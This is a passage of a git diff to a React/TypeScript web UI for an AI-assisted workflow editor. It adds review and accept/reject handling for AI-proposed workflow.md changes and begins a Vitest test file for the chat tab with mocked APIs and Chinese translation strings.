-    if (!workflow?.markdownContent) return;
-    const blob = new Blob([workflow.markdownContent], { type: 'text/markdown' });
+  const editDocDirty = editDocDraft !== editDocBase;
+  const editDocDiffLines = useMemo(() => (
+    editDocDiff ? buildLineDiff(editDocDiff.before, editDocDiff.after) : []
+  ), [editDocDiff]);
+  const editDocDiffStats = useMemo(() => ({
+    added: editDocDiffLines.filter((line) => line.type === 'add').length,
+    removed: editDocDiffLines.filter((line) => line.type === 'remove').length,
+  }), [editDocDiffLines]);
+  const editDocDiffHunks = useMemo(() => (
+    editDocDiff ? buildTextDiffHunks(editDocDiff.before, editDocDiff.after) : []
+  ), [editDocDiff]);
+
+  const handleWorkflowChatSessionChange = useCallback((sessionId: string | null) => {
+    const workflowId = workflow?.id;
+    setWorkflowChatSession(sessionId && workflowId ? { workflowId, sessionId } : null);
+  }, [workflow?.id]);
+
+  const recordEditDocReviewResult = useCallback(async ({
+    decision,
+    scope,
+    hunk,
+    remainingHunks,
+  }: {
+    decision: 'accepted' | 'rejected';
+    scope: 'full_diff' | 'hunk';
+    hunk?: TextDiffHunk;
+    remainingHunks?: number;
+  }) => {
+    const workflowId = workflow?.id;
+    const chatSession = workflowChatSession;
+    const sessionId = chatSession && chatSession.workflowId === workflowId
+      ? chatSession.sessionId
+      : null;
+    if (!workflowId || !sessionId) return;
+
+    const proposedChangeApplied = decision === 'accepted'
+      ? (scope === 'full_diff' ? 'true' : 'true_for_this_hunk')
+      : (scope === 'full_diff' ? 'false' : 'false_for_this_hunk');
+    const reviewState = remainingHunks && remainingHunks > 0 ? 'pending_remaining_hunks' : 'completed';
+    const summary = decision === 'accepted'
+      ? (scope === 'full_diff'
+        ? 'The user accepted the AI-proposed workflow.md diff. Treat the current workflow.md content as successfully applied.'
+        : 'The user accepted this workflow.md diff hunk. Treat this hunk as successfully applied while the remaining hunks may still need review.')
+      : (scope === 'full_diff'
+        ? 'The user rejected the AI-proposed workflow.md diff. Treat the proposed change as not applied; workflow.md was restored to the previous content.'
+        : 'The user rejected this workflow.md diff hunk. Treat this hunk as not applied; workflow.md was saved with this hunk reverted.');
+
+    const text = [
+      '[Workflow markdown diff review result]',
+      'Use this hidden context in future assistant turns. Do not claim a proposed workflow.md change succeeded unless proposed_change_applied is true or true_for_this_hunk.',
+      `workflow_id: ${workflowId}`,
+      'file: workflow.md',
+      `decision: ${decision}`,
+      `scope: ${scope}`,
+      `proposed_change_applied: ${proposedChangeApplied}`,
+      `review_state: ${reviewState}`,
+      ...(hunk ? [
+        `hunk_id: ${hunk.id}`,
+        `hunk_added_lines: ${hunk.added}`,
+        `hunk_removed_lines: ${hunk.removed}`,
+      ] : []),
+      remainingHunks !== undefined ? `remaining_diff_hunks: ${remainingHunks}` : null,
+      `summary: ${summary}`,
+    ].filter(Boolean).join('\n');
+
+    try {
+      await sessionApi.sendMessage(sessionId, {
+        parts: [{ type: 'text', text }],
+        noReply: true,
+      });
+    } catch (err) {
+      console.warn('[WorkflowDetail] failed to record workflow markdown review result', err);
+    }
+  }, [workflow?.id, workflowChatSession]);
+
+  // 导出 workflow.md
+  const handleExportEditDoc = useCallback(() => {
+    if (!workflow || !editDocDraft.trim()) return;
+    const blob = new Blob([editDocDraft], { type: 'text/markdown' });
     const url = URL.createObjectURL(blob);
     const a = document.createElement('a');
     a.href = url;
-    a.download = `workflow-${workflow.name || workflow.id}.md`;
+    a.download = `${workflow.id || workflow.name}.md`;
     a.click();
     URL.revokeObjectURL(url);
-  }, [workflow]);
+  }, [editDocDraft, workflow]);
+
+  const buildEditDocGenerationPrompt = useCallback(() => {
+    if (!workflow) return '';
+    const workflowDir = workflow.source === 'global'
+      ? `~/.flocks/plugins/workflows/${workflow.id}/`
+      : `.flocks/plugins/workflows/${workflow.id}/`;
+
+    return t('detail.generateEditDocPrompt', {
+      name: workflow.name,
+      dir: workflowDir,
+      mdPath: `${workflowDir}workflow.md`,
+      jsonPath: `${workflowDir}workflow.json`,
+      workflowJson: JSON.stringify(workflow.workflowJson, null, 2),
+    });
+  }, [t, workflow]);
+
+  const launchEditDocGeneration = useCallback(() => {
+    if (!workflow) return;
+
+    openAiEditPanel();
+    setChatLaunchRequest({
+      id: chatLaunchSeqRef.current + 1,
+      prompt: buildEditDocGenerationPrompt(),
+      displayLabel: t('detail.generateEditDoc'),
+    });
+    chatLaunchSeqRef.current += 1;
+  }, [buildEditDocGenerationPrompt, openAiEditPanel, t, workflow]);
+
+  const handleGenerateEditDoc = useCallback(() => {
+    if (!workflow) return;
+    if (!editDocDraft.trim()) {
+      launchEditDocGeneration();
+      return;
+    }
+
+    setEditDocDraft(buildWorkflowMarkdown(workflow));
+    setEditDocDiff(null);
+    setEditDocMode('edit');
+    setShowMdHint(false);
+  }, [editDocDraft, launchEditDocGeneration, workflow]);
+
+  const buildWorkflowGenerationPrompt = useCallback((editDocContent: string) => {
+    if (!workflow) return '';
+    const workflowDir = workflow.source === 'global'
+      ? `~/.flocks/plugins/workflows/${workflow.id}/`
+      : `.flocks/plugins/workflows/${workflow.id}/`;
+
+    return t('detail.generateWorkflowPrompt', {
+      name: workflow.name,
+      dir: workflowDir,
+      mdPath: `${workflowDir}workflow.md`,
+      jsonPath: `${workflowDir}workflow.json`,
+      editDocContent,
+    });
+  }, [t, workflow]);
+
+  const launchWorkflowGeneration = useCallback((content: string) => {
+    if (!workflow) return;
+
+    openAiEditPanel();
+    setChatLaunchRequest({
+      id: chatLaunchSeqRef.current + 1,
+      prompt: buildWorkflowGenerationPrompt(content),
+      displayLabel: t('detail.generateWorkflow'),
+    });
+    chatLaunchSeqRef.current += 1;
+  }, [buildWorkflowGenerationPrompt, openAiEditPanel, t, workflow]);
+
+  const launchWorkflowGuidePrompt = useCallback((prompt: string, displayLabel: string) => {
+    openAiEditPanel();
+    setChatLaunchRequest({
+      id: chatLaunchSeqRef.current + 1,
+      prompt,
+      displayLabel,
+    });
+    chatLaunchSeqRef.current += 1;
+  }, [openAiEditPanel]);
+
+  const handleGenerateWorkflow = useCallback(() => {
+    if (!workflow) return;
+    const content = editDocDraft.trim();
+    if (!content) {
+      launchEditDocGeneration();
+      return;
+    }
+
+    launchWorkflowGeneration(editDocDraft);
+  }, [editDocDraft, launchEditDocGeneration, launchWorkflowGeneration, workflow]);
+
+  useEffect(() => {
+    if (rightPanelTab !== 'chat') return;
+    if (!workflow || editDocDraft.trim() || !hasWorkflowJsonDefinition(workflow)) return;
+    if (chatLaunchRequest) return;
+    if (missingMarkdownAutoLaunchRef.current === workflow.id) return;
+    missingMarkdownAutoLaunchRef.current = workflow.id;
+    launchEditDocGeneration();
+  }, [chatLaunchRequest, editDocDraft, launchEditDocGeneration, rightPanelTab, workflow]);
+
+  const handleChatLaunchRequestHandled = useCallback((requestId: number) => {
+    setChatLaunchRequest((current) => (
+      current?.id === requestId ? null : current
+    ));
+  }, []);
+
+  const handleSaveEditDoc = useCallback(async () => {
+    if (!workflow || editDocSaving) return;
+    const regenerateAfterSave = await confirm({
+      title: t('detail.regenerateWorkflowConfirmTitle'),
+      description: t('detail.regenerateWorkflowConfirmDesc'),
+      confirmText: t('detail.regenerateWorkflowConfirmYes'),
+      cancelText: t('detail.regenerateWorkflowConfirmNo'),
+      variant: 'default',
+    });
+    const content = editDocDraft.endsWith('\n') ? editDocDraft : `${editDocDraft}\n`;
+    setEditDocSaving(true);
+    try {
+      const response = await workflowAPI.update(workflow.id, {
+        markdownContent: content,
+      });
+      const updated = {
+        ...response.data,
+        markdownContent: response.data.markdownContent ?? content,
+        editMarkdownContent: response.data.editMarkdownContent ?? response.data.markdownContent ?? content,
+      };
+      setWorkflow(updated);
+      setEditDocDraft(updated.markdownContent ?? content);
+      setEditDocBase(updated.markdownContent ?? content);
+      setEditDocDiff(null);
+      setEditDocMode('preview');
+      showToast('success', t('detail.editDocSaveSuccess'));
+      if (regenerateAfterSave) {
+        launchWorkflowGeneration(updated.markdownContent ?? content);
+      }
+    } catch (err: unknown) {
+      showToast('error', `${t('detail.editDocSaveFailed')}: ${extractErrorMessage(err)}`);
+    } finally {
+      setEditDocSaving(false);
+    }
+  }, [confirm, editDocDraft, editDocSaving, launchWorkflowGeneration, showToast, t, workflow]);
+
+  const handleAcceptEditDocDiff = useCallback(() => {
+    setEditDocDiff(null);
+    setShowMdHint(false);
+    showToast('success', t('detail.editDocDiffAcceptSuccess'));
+    void recordEditDocReviewResult({
+      decision: 'accepted',
+      scope: 'full_diff',
+      remainingHunks: 0,
+    });
+  }, [recordEditDocReviewResult, showToast, t]);
+
+  const handleAcceptEditDocDiffHunk = useCallback((hunk: TextDiffHunk) => {
+    if (!editDocDiff) return;
+    const nextBefore = acceptTextDiffHunk(editDocDiff.before, hunk);
+    if (nextBefore === editDocDiff.after) {
+      setEditDocDiff(null);
+      setShowMdHint(false);
+    } else {
+      setEditDocDiff({
+        before: nextBefore,
+        after: editDocDiff.after,
+      });
+    }
+    showToast('success', t('detail.editDocDiffAcceptHunkSuccess'));
+    void recordEditDocReviewResult({
+      decision: 'accepted',
+      scope: 'hunk',
+      hunk,
+      remainingHunks: nextBefore === editDocDiff.after ? 0 : Math.max(0, editDocDiffHunks.length - 1),
+    });
+  }, [editDocDiff, editDocDiffHunks.length, recordEditDocReviewResult, showToast, t]);
+
+  const handleRejectEditDocDiff = useCallback(async () => {
+    if (!workflow || !editDocDiff || editDocReviewing) return;
+    const content = editDocDiff.before;
+    setEditDocReviewing('reject');
+    try {
+      const response = await workflowAPI.update(workflow.id, {
+        markdownContent: content,
+      });
+      const updated = {
+        ...response.data,
+        markdownContent: response.data.markdownContent ?? content,
+        editMarkdownContent: response.data.editMarkdownContent ?? response.data.markdownContent ?? content,
+      };
+      setWorkflow(updated);
+      setEditDocDraft(updated.markdownContent ?? content);
+      setEditDocBase(updated.markdownContent ?? content);
+      setEditDocDiff(null);
+      setEditDocMode('edit');
+      setShowMdHint(false);
+      showToast('success', t('detail.editDocDiffRejectSuccess'));
+      void recordEditDocReviewResult({
+        decision: 'rejected',
+        scope: 'full_diff',
+        remainingHunks: 0,
+      });
+    } catch (err: unknown) {
+      showToast('error', `${t('detail.editDocDiffRejectFailed')}: ${extractErrorMessage(err)}`);
+    } finally {
+      setEditDocReviewing(null);
+    }
+  }, [editDocDiff, editDocReviewing, recordEditDocReviewResult, showToast, t, workflow]);
+
+  const handleRejectEditDocDiffHunk = useCallback(async (hunk: TextDiffHunk) => {
+    if (!workflow || !editDocDiff || editDocReviewing) return;
+    const content = rejectTextDiffHunk(editDocDiff.after, hunk);
+    setEditDocReviewing(`reject:${hunk.id}`);
+    try {
+      const response = await workflowAPI.update(workflow.id, {
+        markdownContent: content,
+      });
+      const updated = {
+        ...response.data,
+        markdownContent: response.data.markdownContent ?? content,
+        editMarkdownContent: response.data.editMarkdownContent ?? response.data.markdownContent ?? content,
+      };
+      const nextAfter = updated.markdownContent ?? content;
+      setWorkflow(updated);
+      setEditDocDraft(nextAfter);
+      setEditDocBase(nextAfter);
+      if (nextAfter === editDocDiff.before) {
+        setEditDocDiff(null);
+        setShowMdHint(false);
+      } else {
+        setEditDocDiff({
+          before: editDocDiff.before,
+          after: nextAfter,
+        });
+      }
+      setEditDocMode('edit');
+      showToast('success', t('detail.editDocDiffRejectHunkSuccess'));
+      void recordEditDocReviewResult({
+        decision: 'rejected',
+        scope: 'hunk',
+        hunk,
+        remainingHunks: nextAfter === editDocDiff.before ? 0 : Math.max(0, editDocDiffHunks.length - 1),
+      });
+    } catch (err: unknown) {
+      showToast('error', `${t('detail.editDocDiffRejectHunkFailed')}: ${extractErrorMessage(err)}`);
+    } finally {
+      setEditDocReviewing(null);
+    }
+  }, [editDocDiff, editDocDiffHunks.length, editDocReviewing, recordEditDocReviewResult, showToast, t, workflow]);
 
   // 用户手动切换 canvas tab 时，阻止后续自动跳转
   const handleCanvasTabChange = useCallback((tab: CanvasTab) => {
@@ -191,14 +570,28 @@ export default function WorkflowDetail() {
 
   // 对话编辑模式：Rex 修改工作流后，ChatTab 即时通知刷新画布和节点抽屉
   const handleWorkflowUpdated = useCallback((updated: Workflow) => {
+    const previousMarkdown = workflow?.markdownContent ?? workflow?.editMarkdownContent ?? '';
+    const nextMarkdown = updated.markdownContent ?? updated.editMarkdownContent ?? '';
+    const markdownChanged = (
+      nextMarkdown !== previousMarkdown
+    );
     setWorkflow(updated);
+    if (markdownChanged) {
+      setEditDocDiff({
+        before: previousMarkdown,
+        after: nextMarkdown,
+      });
+      setCanvasTab('md');
+      setEditDocMode('edit');
+      setShowMdHint(true);
+    }
     // 同步更新节点抽屉：若当前打开的节点在新版本中存在则用最新数据，否则关闭抽屉
     setDrawerNode((prev) => {
       if (!prev) return null;
       const fresh = updated.workflowJson.nodes.find((n) => n.id === prev.id);
       return fresh ?? null;
     });
-  }, []);
+  }, [workflow?.editMarkdownContent, workflow?.markdownContent]);
 
   if (loading) {
     return (
@@ -254,9 +647,9 @@ export default function WorkflowDetail() {
       )}
 
       {/* 主体区域：画布 + 拖动分隔条 + 右侧面板 */}
-      <div className="flex flex-1 min-h-0 overflow-hidden">
+      <div className="relative isolate flex flex-1 min-h-0 overflow-hidden">
         {/* 左侧画布区域（含三 Tab） */}
-        <div className="flex flex-col flex-1 min-w-0">
+        <div className="relative z-0 flex flex-col flex-1 min-w-0 overflow-hidden">
           {/* Canvas Tab 栏 */}
           <div className="flex items-center border-b border-gray-200 bg-white flex-shrink-0 px-2">
             {CANVAS_TABS.map((tab) => (
@@ -299,52 +692,58 @@ export default function WorkflowDetail() {
                 workflowJson={workflow.workflowJson}
                 editable={false}
                 onNodeClick={(node) => setDrawerNode(node)}
-                layoutKey={layoutKey}
               />
-              {/* 重置布局按钮 - 右上角浮动 */}
+              {/* 流程图快捷操作 */}
               <button
-                onClick={handleAutoLayout}
-                className="absolute top-3 right-3 z-10 flex items-center gap-1.5 px-3 py-1.5 bg-white border border-gray-200 text-gray-600 text-xs rounded-lg hover:bg-gray-50 shadow-sm transition-colors"
-                title={t('detail.resetLayout')}
+                onClick={handleFlocksHelp}
+                className="absolute left-3 top-2 z-20 inline-flex max-w-[calc(100%-7rem)] items-center gap-2 truncate whitespace-nowrap rounded-lg border border-emerald-100 bg-white/90 px-3 py-1.5 text-xs font-medium text-slate-700 backdrop-blur transition-colors hover:border-emerald-200 hover:bg-emerald-50/80 hover:text-emerald-700 focus:outline-none focus:ring-2 focus:ring-emerald-100"
+                title={t('detail.flocksHelpTitle')}
               >
-                <Layout className="w-3.5 h-3.5" />
-                {t('detail.resetLayout')}
+                <Bot className="h-4 w-4 flex-shrink-0 text-emerald-500" />
+                <span className="truncate">{t('detail.flocksHelp')}</span>
               </button>
             </div>
 
             {/* MD 描述 */}
             {canvasTab === 'md' && (
-              <div className="absolute inset-0 overflow-y-auto bg-white p-6">
-                {/* 下载 MD 按钮 - 右上角浮动 */}
-                <button
-                  onClick={handleExportMd}
-                  disabled={!workflow.markdownContent}
-                  className="absolute top-3 right-3 z-10 flex items-center gap-1.5 px-3 py-1.5 bg-white border border-gray-200 text-gray-600 text-xs rounded-lg hover:bg-gray-50 shadow-sm disabled:opacity-40 disabled:cursor-not-allowed transition-colors"
-                  title={t('detail.downloadMdTitle')}
-                >
-                  <Download className="w-3.5 h-3.5" />
-                  {t('detail.downloadMd')}
-                </button>
-                {workflow.markdownContent ? (
-                  <div className="max-w-3xl mx-auto prose prose-sm prose-gray leading-relaxed">
-                    <ReactMarkdown remarkPlugins={[remarkGfm]}>
-                      {workflow.markdownContent}
-                    </ReactMarkdown>
-                  </div>
-                ) : (
-                  <div className="flex flex-col items-center justify-center h-full gap-2 text-gray-400">
-                    <FileText className="w-10 h-10 opacity-40" />
-                    <p className="text-sm">{t('detail.noMdDesc')}</p>
-                    <p className="text-xs">{t('detail.noMdDescHint')}</p>
-                  </div>
-                )}
-              </div>
+              <WorkflowDocumentPanel
+                mode={editDocMode}
+                value={editDocDraft}
+                dirty={editDocDirty}
+                saving={editDocSaving}
+                saveDisabled={!editDocDirty || editDocSaving}
+                onModeChange={setEditDocMode}
+                onChange={(value) => {
+                  setEditDocDraft(value);
+                  setEditDocDiff(null);
+                }}
+                onResetDocument={handleGenerateEditDoc}
+                onSave={() => void handleSaveEditDoc()}
+                onGenerateWorkflow={handleGenerateWorkflow}
+                onDownload={handleExportEditDoc}
+                diffReview={
+                  editDocDiff ? (
+                    <WorkflowMarkdownDiffReview
+                      lines={editDocDiffLines}
+                      hunks={editDocDiffHunks}
+                      added={editDocDiffStats.added}
+                      removed={editDocDiffStats.removed}
+                      reviewingId={editDocReviewing}
+                      disabled={editDocSaving || editDocReviewing !== null}
+                      onAccept={handleAcceptEditDocDiff}
+                      onReject={() => void handleRejectEditDocDiff()}
+                      onAcceptHunk={handleAcceptEditDocDiffHunk}
+                      onRejectHunk={(hunk) => void handleRejectEditDocDiffHunk(hunk)}
+                    />
+                  ) : undefined
+                }
+              />
             )}
 
             {/* JSON */}
             {canvasTab === 'json' && (
               <div className="absolute inset-0 overflow-y-auto bg-gray-900 p-4">
-                {/* 下载 JSON 按钮 - 右上角浮动 */}
+                {/* 下载工作流文件按钮 - 右上角浮动 */}
                 <button
                   onClick={handleExport}
                   className="absolute top-3 right-3 z-10 flex items-center gap-1.5 px-3 py-1.5 bg-gray-700 border border-gray-600 text-gray-200 text-xs rounded-lg hover:bg-gray-600 shadow-sm transition-colors"
@@ -380,7 +779,7 @@ export default function WorkflowDetail() {
         {panelOpen && (
           <div
             onMouseDown={onDragStart}
-            className="w-1 flex-shrink-0 bg-gray-200 hover:bg-red-400 active:bg-red-500 cursor-col-resize transition-colors duration-150 relative group"
+            className="relative z-20 w-1 flex-shrink-0 bg-gray-200 hover:bg-red-400 active:bg-red-500 cursor-col-resize transition-colors duration-150 group"
             title={t('detail.dragAdjust')}
           >
             <div className="absolute inset-y-0 -left-1.5 -right-1.5" />
@@ -393,10 +792,16 @@ export default function WorkflowDetail() {
           latestExecution={latestExecution}
           open={panelOpen}
           width={panelWidth}
+          activeTab={rightPanelTab}
+          onActiveTabChange={handleRightPanelTabChange}
+          chatLaunchRequest={chatLaunchRequest}
+          onChatLaunchRequestHandled={handleChatLaunchRequestHandled}
           onLatestExecutionChange={setLatestExecution}
           onExecutionSettled={refreshWorkflowStats}
           onWorkflowUpdated={handleWorkflowUpdated}
           onFirstMessageSent={handleFirstMessageSent}
+          onSessionChange={handleWorkflowChatSessionChange}
+          onGuidePrompt={launchWorkflowGuidePrompt}
           selectedNode={drawerNode}
           onDeselectNode={() => setDrawerNode(null)}
           onDelete={handleDelete}
diff --git a/webui/src/pages/WorkflowDetail/tabs/ChatTab.test.tsx b/webui/src/pages/WorkflowDetail/tabs/ChatTab.test.tsx
new file mode 100644
index 000000000..894f218e8
--- /dev/null
+++ b/webui/src/pages/WorkflowDetail/tabs/ChatTab.test.tsx
@@ -0,0 +1,623 @@
+import { render, screen, waitFor } from '@testing-library/react';
+import userEvent from '@testing-library/user-event';
+import { beforeEach, describe, expect, it, vi } from 'vitest';
+import { MemoryRouter } from 'react-router-dom';
+import type { ComponentProps } from 'react';
+
+import ChatTab from './ChatTab';
+import { workflowAPI } from '@/api/workflow';
+import { setStoredSessions } from '../sessionStorage';
+
+const {
+  capturedSessionChatProps,
+  capturedSessionOptions,
+  mockClientGet,
+  mockCreate,
+  mockCreateAndSend,
+  mockReset,
+  mockSendPrompt,
+  mockUseAgents,
+  mockUseProviders,
+  mockDefaultModelGetResolved,
+  mockModelListDefinitions,
+} = vi.hoisted(() => ({
+  capturedSessionChatProps: [] as any[],
+  capturedSessionOptions: [] as any[],
+  mockClientGet: vi.fn(),
+  mockCreate: vi.fn(),
+  mockCreateAndSend: vi.fn(),
+  mockReset: vi.fn(),
+  mockSendPrompt: vi.fn(),
+  mockUseAgents: vi.fn(),
+  mockUseProviders: vi.fn(),
+  mockDefaultModelGetResolved: vi.fn(),
+  mockModelListDefinitions: vi.fn(),
+}));
+
+vi.mock('@/hooks/useDefaultModelVision', () => ({
+  useDefaultModelVision: () => false,
+}));
+
+vi.mock('@/hooks/useSessionChat', () => ({
+  useSessionChat: (options: any) => {
+    capturedSessionOptions.push(options);
+    return {
+      sessionId: null,
+      loading: false,
+      error: null,
+      create: mockCreate,
+      createAndSend: mockCreateAndSend,
+      reset: mockReset,
+    };
+  },
+}));
+
+vi.mock('@/api/client', () => ({
+  default: { get: mockClientGet },
+}));
+
+vi.mock('@/api/workflow', () => ({
+  workflowAPI: { get: vi.fn() },
+  workflowAPIEndpoints: (id: string, triggerId = '{triggerId}') => {
+    const workflowBase = `/api/workflow/${id}`;
+    const triggerBase = `${workflowBase}/triggers`;
+    const triggerRecord = `${triggerBase}/${triggerId}`;
+    return {
+      config: {
+        read: `GET ${workflowBase}/config`,
+        write: `PUT ${workflowBase}/config`,
+        syncFallback: `POST ${workflowBase}/config/sync`,
+      },
+      apiService: {
+        read: `GET ${workflowBase}/service`,
+        publish: `POST ${workflowBase}/publish`,
+        unpublish: `POST ${workflowBase}/unpublish`,
+        delete: `DELETE ${workflowBase}/service`,
+      },
+      triggers: {
+        list: `GET ${triggerBase}`,
+        create: `POST ${triggerBase}`,
+        update: `PUT ${triggerRecord}`,
+        delete: `DELETE ${triggerRecord}`,
+        status: `GET ${triggerRecord}/status`,
+        previewMapping: `POST ${triggerRecord}/preview-mapping`,
+        test: `POST ${triggerRecord}/test`,
+        invokeWebhook: `/webhook/workflows/${id}/${triggerId}`,
+        plugins: 'GET /api/workflow-trigger-plugins',
+      },
+      legacyAdapters: {
+        kafkaConfig: `GET/POST ${workflowBase}/kafka-config`,
+        kafkaStatus: `GET ${workflowBase}/kafka-status`,
+        pollerConfig: `GET/POST ${workflowBase}/poller-config`,
+        pollerStatus: `GET ${workflowBase}/poller-status`,
+        pollerRunOnce: `POST ${workflowBase}/poller-run-once`,
+        syslogConfig: `GET/POST ${workflowBase}/syslog-config`,
+        syslogStatus: `GET ${workflowBase}/syslog-status`,
+      },
+    };
+  },
+}));
+
+vi.mock('@/hooks/useAgents', () => ({
+  useAgents: mockUseAgents,
+}));
+
+vi.mock('@/hooks/useProviders', () => ({
+  useProviders: mockUseProviders,
+}));
+
+vi.mock('@/api/provider', () => ({
+  defaultModelAPI: { getResolved: mockDefaultModelGetResolved },
+  modelV2API: { listDefinitions: mockModelListDefinitions },
+}));
+
+vi.mock('@/components/common/SessionChat', () => ({
+  buildInstructionDisplayText: (label: string) => `@@flocks-instruction:${label}`,
+  default: (props: any) => {
+    capturedSessionChatProps.push(props);
+    return (
+      <div data-testid="session-chat">
+        {props.toolbarSlot}
+        {props.centerToolbarSlot}
+        {props.welcomeContent}
+        {props.conversationBottomSlot?.({ sendPrompt: mockSendPrompt, sending: false })}
+      </div>
+    );
+  },
+}));
+
+vi.mock('react-i18next', () => ({
+  useTranslation: () => ({
+    t: (key: string, params?: Record<string, unknown>) => {
+      const translations: Record<string, string> = {
+        'detail.chat.sessionTitle': '修改工作流「{{name}}」',
+        'detail.chat.backendConfigAccessGuide': '后端配置库认证方式：使用 server_api_token，并通过 Authorization: Bearer 访问 {{configEndpoint}}；兜底迁移接口是 {{configSyncEndpoint}}。',
+        'detail.chat.contextMessage': [
+          '工作流 ID： {{id}}',
+          '工作流名称： {{name}}',
+          '工作流目录： {{dir}}',
+          'MD 文件： {{mdPath}}',
+          '工作流配置引导文件： {{guidePath}}',
+          '前端当前 API 清单：',
+          '{{apiEndpoints}}',
+          '配置工作流时必须先读取 guide.md；{{configSkillName}} 只提供交互协议。',
+        ].join('\n'),
+        'detail.chat.inputPlaceholder': '描述你想对工作流做的修改...',
+        'detail.chat.newSession': '新建会话',
+        'detail.chat.historyLabel': '历史会话',
+        'detail.chat.currentLabel': '当前',
+        'detail.chat.welcome.title': '{{name}} 当前状态',
+        'detail.chat.welcome.descPart1': '你可以直接描述需求。',
+        'detail.chat.welcome.descPart2': '。',
+        'detail.chat.welcome.mdTabLabel': '流程说明',
+        'detail.chat.welcome.editPanelTitle': 'Rex 辅助修改',
+        'detail.chat.welcome.editPanelDesc': '选择一个修改入口，Rex 会先读取 {{name}}。',
+        'detail.chat.welcome.editSectionTitle': '辅助修改',
+        'detail.chat.welcome.configSectionTitle': '辅助配置',
+        'detail.chat.welcome.publishSectionTitle': '辅助发布',
+        'detail.chat.welcome.editRequirementShort': '修改功能需求',
+        'detail.chat.welcome.editRequirementDesc': '整理功能修改需求',
+        'detail.chat.welcome.editRequirementPrompt': '用户点击了「修改功能需求」按钮。工作流 ID 是 {{id}}，工作流目录是 {{dir}}，MD 文件是 {{mdPath}}。',
+        'detail.chat.welcome.editNodeFunctionShort': '修改节点功能',
+        'detail.chat.welcome.editNodeFunctionDesc': '调整节点做什么',
+        'detail.chat.welcome.editNodeFunctionPrompt': '用户点击了「修改节点功能」按钮。工作流 ID 是 {{id}}，工作流目录是 {{dir}}，MD 文件是 {{mdPath}}。',
+        'detail.chat.welcome.editNodeShort': '编辑节点实现',
+        'detail.chat.welcome.editNodeDesc': '调整节点代码和连接',
+        'detail.chat.welcome.editNodePrompt': '用户点击了「编辑节点实现」按钮。工作流 ID 是 {{id}}，工作流目录是 {{dir}}，MD 文件是 {{mdPath}}。',
+        'detail.chat.welcome.editFlowShort': '调整流程结构',
+        'detail.chat.welcome.editFlowDesc': '调整节点和边',
+        'detail.chat.welcome.editFlowPrompt': '用户点击了「调整流程结构」按钮。工作流 ID 是 {{id}}，工作流目录是 {{dir}}，MD 文件是 {{mdPath}}。',
+        'detail.chat.welcome.editRegenerateShort': '生成工作流',
+        'detail.chat.welcome.editRegenerateDesc': '基于 workflow.md 生成 workflow.json',
+        'detail.chat.welcome.editRegeneratePrompt': '用户点击了「生成工作流」按钮。基于 workflow.md 生成 workflow.json。工作流 ID 是 {{id}}，工作流目录是 {{dir}}，MD 文件是 {{mdPath}}。',
+        'detail.chat.welcome.canHelp': '我可以帮你：',
+        'detail.chat.welcome.bullet1': '修改节点',
+        'detail.chat.welcome.bullet2': '调整流转',
+        'detail.chat.welcome.bullet3': '新增节点',
+        'detail.chat.welcome.bullet4': '重构结构',
+        'detail.chat.welcome.tipPart1': '先看左侧',
+        'detail.chat.welcome.tipPart2': '。',
+        'detail.chat.welcome.retry': '重试',
+        'detail.chat.welcome.guideExpand': '展开',
+        'detail.chat.welcome.guideCollapse': '收起',
+        'detail.chat.welcome.guidePrimaryShort': '帮我智能配置',
+        'detail.chat.welcome.guidePrimaryDesc': '配置工作流',
+        'detail.chat.welcome.guidePrompt': '用户点击了「帮我智能配置」按钮。请从 {{guidePath}} 获取工作流有哪些配置，包括发布配置、工作流执行配置等。工作流 ID 是 {{id}}，工作流目录是 {{dir}}。配置模板接口是 GET/PUT {{configEndpoint}}，兜底迁移接口是 {{configSyncEndpoint}}。前端当前 API 清单：{{apiEndpoints}}。config.json 和 workflow.json 只能作为迁移兜底；后端接口不可用时必须停止配置流程。',
+        'detail.chat.welcome.guideInputModeShort': '配置输入方式',
+        'detail.chat.welcome.guideInputModeDesc': '选择 API、Syslog 或其它输入',
+        'detail.chat.welcome.guideInputModeInstruction': '不要要求 guide.md 存在按钮表；请围绕输入模式自动提取引导信息并发一个 question 卡片。',
+        'detail.chat.welcome.guideSourceShapeShort': '确认来源数据',
+        'detail.chat.welcome.guideSourceShapeDesc': '确认来源产品和数据格式',
+        'detail.chat.welcome.guideSourceShapeInstruction': '请围绕来源形态发一个 question 卡片。',
+        'detail.chat.welcome.guideOutputShort': '设置输出去向',
+        'detail.chat.welcome.guideOutputDesc': '确认输出位置',
+        'detail.chat.welcome.guideOutputInstruction': '请围绕输出去向发一个 question 卡片。',
+        'detail.chat.welcome.guideFilterShort': '调整过滤规则',
+        'detail.chat.welcome.guideFilterDesc': '确认过滤和去重规则',
+        'detail.chat.welcome.guideFilterInstruction': '请围绕过滤规则发一个 question 卡片。',
+        'detail.chat.welcome.guideApplyShort': '应用配置方案',
+        'detail.chat.welcome.guideApplyDesc': '确认应用或保存草稿',
+        'detail.chat.welcome.guideApplyInstruction': '请围绕应用方式发一个 question 卡片。',
+        'detail.chat.welcome.guideSampleInstruction': '请围绕样例验证发一个 question 卡片。',
+        'detail.chat.welcome.guideQuestionPrompt': '用户点击了「{{focus}}」按钮。这个按钮的意图是：{{instruction}} 第一步必须读取 {{guidePath}}，不要要求 guide.md 存在按钮表，请从全文自动提取相关引导信息。工作流 ID 是 {{id}}，工作流目录是 {{dir}}。配置模板接口是 GET/PUT {{configEndpoint}}，兜底迁移接口是 {{configSyncEndpoint}}。前端当前 API 清单：{{apiEndpoints}}。config.json 和 workflow.json 不能直接写。后端接口不可用时必须停止配置流程，不要追问用户要对 workflow.json 模板触发器做什么。必须调用 question 工具，并提供自定义输入，没有则填 none。',
+        'detail.chat.welcome.guideAuditShort': '检查当前配置',
+        'detail.chat.welcome.guideAuditDesc': '检查缺失项',
+        'detail.chat.welcome.auditPrompt': '请先读取 {{guidePath}} 后检查配置。工作流 ID 是 {{id}}，工作流目录是 {{dir}}。',
+        'detail.chat.welcome.guideSampleShort': '验证样例数据',
+        'detail.chat.welcome.guideSampleDesc': '验证输入输出',
+        'detail.chat.welcome.samplePrompt': '请先读取 {{guidePath}} 后验证样例。工作流 ID 是 {{id}}，工作流目录是 {{dir}}。',
+        'detail.run.guideApiShort': '发布为 API',
+        'detail.run.guideApiDesc': '配置 API 发布',
+        'detail.run.guideApiInstruction': '围绕 API 发布读取 guide.md，先 GET {{configEndpoint}}，确认后 PUT {{configEndpoint}}，config.json 和 workflow.json 不是直接写入目标；后端接口不可用时必须停止配置流程',
+        'detail.run.guideSyslogShort': 'Syslog 接入',
+        'detail.run.guideSyslogDesc': '配置 Syslog 接入',
